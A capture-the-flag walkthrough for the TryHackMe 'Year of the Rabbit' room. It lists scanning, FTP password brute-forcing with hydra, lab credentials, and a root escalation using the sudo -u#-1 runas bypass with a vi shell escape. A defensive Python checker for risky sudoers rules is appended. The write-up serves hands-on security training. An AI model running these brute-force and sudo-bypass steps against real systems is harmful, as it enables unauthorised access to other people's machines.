Year of the Rabbit
Room Link: https://tryhackme.com/room/yearoftherabbit
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Turn off Javascript
Enter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.



Kali
strings Hot_Babe.png 
Kali
hydra -l ftpuser -P passwords.txt ftp://$VICTIM
FTP
Kali
ftp $VICTIM
password: 5iez1wGXKfPKQ

Eli's credentials are encoded in a language called Brainfuck. There are tools online to decode it.
Link: https://www.dcode.fr/brainfuck-language

Kali
ssh eli@$VICTIM
Password: DSpDiM1wAEwid
Victim
locate s3cr3t
cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!

Victim
su gwendoline
Password: MniVCQVhQHUNI
Privilege escalation
This mostly follows the link below. We can't use sudo to run the command as root because the rule here is (ALL, !root); with (ALL, ALL) it would be easy to escalate. Adding sudo -u#-1 in front of the command bypasses this restriction.
Link: https://www.exploit-db.com/exploits/47502
Victim
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh
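A defender-side check for the sudoers pattern described above, as an added example that is not part of the original write-up: it flags rules whose run-as list allows ALL but excludes root only by negation, which is the restriction the -u#-1 prefix gets around. The sample sudoers text (including the NOPASSWD tag and the backup and deploy entries) and the function names are constructed for illustration.

```python
import re

# Constructed sample sudoers content, not copied from the target host.
SAMPLE_SUDOERS = r"""
# user privilege specification
root        ALL=(ALL:ALL) ALL
gwendoline  ALL=(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
backup      ALL=(ALL, \
                 !#0) /usr/bin/rsync
deploy      ALL=(www-data) /usr/bin/systemctl restart app
%admins     ALL=(ALL) ALL
"""

RUNAS_RE = re.compile(r"\(([^)]*)\)")   # the (users : groups) part of a rule
ROOT_NAMES = {"root", "#0"}             # root by name or by numeric uid


def logical_lines(text):
    """Join backslash-continued lines; drop blank lines and comments."""
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.strip()
        # '#' followed by a digit is a uid (e.g. '#1000 ALL=...'), not a comment
        if line and not re.match(r"#(?!\d)", line):
            yield line


def risky_runas(text):
    """Return (who, runas_users, command) for rules that allow ALL run-as
    users while trying to exclude root with a negated entry."""
    findings = []
    for line in logical_lines(text):
        if "=" not in line or line.startswith(("Defaults", "@include")):
            continue
        who, spec = line.split()[0], line.split("=", 1)[1]
        for m in RUNAS_RE.finditer(spec):
            users = m.group(1).split(":", 1)[0]            # ignore run-as groups
            items = [u.strip() for u in users.split(",") if u.strip()]
            negated_root = any(
                i.startswith("!") and i[1:].strip() in ROOT_NAMES for i in items)
            if "ALL" in items and negated_root:
                cmd = re.sub(r"^(?:[A-Z_]+:\s*)+", "", spec[m.end():].strip())
                findings.append((who, items, cmd))         # tags like NOPASSWD: stripped
    return findings


if __name__ == "__main__":
    for who, items, cmd in risky_runas(SAMPLE_SUDOERS):
        print(f"{who}: runas ({', '.join(items)}) relies on negation -> {cmd}")
```

On a real host, feed it the contents of /etc/sudoers and the files under /etc/sudoers.d; flagged rules are better rewritten to name the permitted run-as users explicitly instead of excluding root.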